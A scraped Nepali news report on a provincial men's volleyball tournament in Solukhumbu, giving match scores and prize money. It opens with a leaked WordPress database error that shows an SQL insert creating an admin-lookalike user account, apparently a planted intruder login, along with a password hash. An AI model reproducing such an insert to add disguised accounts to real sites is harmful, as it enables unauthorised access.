WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQ.11Sb8LH5Anut1sh8MFThZ5.WGoq0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 10:24:12', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, सोलुखुम्बु । सोलुखुम्बुको सदारमुकाम सल्लेरी स्थित योङ स्टार क्लबको खेलमैदानमा आजबाट शुरु भएको पुरुष भलिबल प्रतियोगितामा घरेलु टिम सोलुखुम्बुले बिजयी सुरुवात गरेको छ ।
मदन भण्डारी स्पोर्ट एकेडेमी प्रदेश नम्बर १ को आयोजनामा प्रदेश स्तरिय पुरुष भलिबल प्रतियोगिता आज भएको खेलमा सोलुखुम्बुले भोजपुरलाई २-० को सोझो सेटमा पराजित गर्यो ।
सुखद सुरुवात गर्ने क्रममा सोलुखुम्बुले भोजपुरलाई २५–१७ र २५–२० को सोझो सेटमा पराजित गर्यो । आज भएको अर्को खेलमा मोरङले खोटाङलाई २५– १४, १२– २५ र २५–२० मा पराजित गर्यो । ओखलढुंगाले तेह्रथुमलाई २५–१८ र २५–२३ को सेटमा पराजित गर्यो । यस्तै झापाले धनकुटालाई २५–२० र २६–२४ को सोझो सेटमा पराजित गर्दा पाँचथर सुनसरीसँग २५– १९ र २५– २२ ले पराजित भयो ।
त्यस्तै, धनकुटाले इलामलाई २१– २५, २५– १९ र २५– १७ मा पराजित गर्यो । ओखलढुंगाले खोटाङलाई २५– १८ र २५– १४ मा पराजित गर्दा र मोरङ र तेह्रथुम बीचको प्रतिस्पर्धात्मक खेलमा तेह्रथुम १९– २५, २५– २१ र २५–१५ ले विजयी भयो ।
आगामी फागुन १० सम्म चल्ने प्रतियोगिताको विजेताले क्रमशः एक लाख ५० हजार, एक लाख र पचास हजार नगदका साथमा ट्रफी, मेडल र प्रमाण पत्र प्राप्त गर्नेछन् ।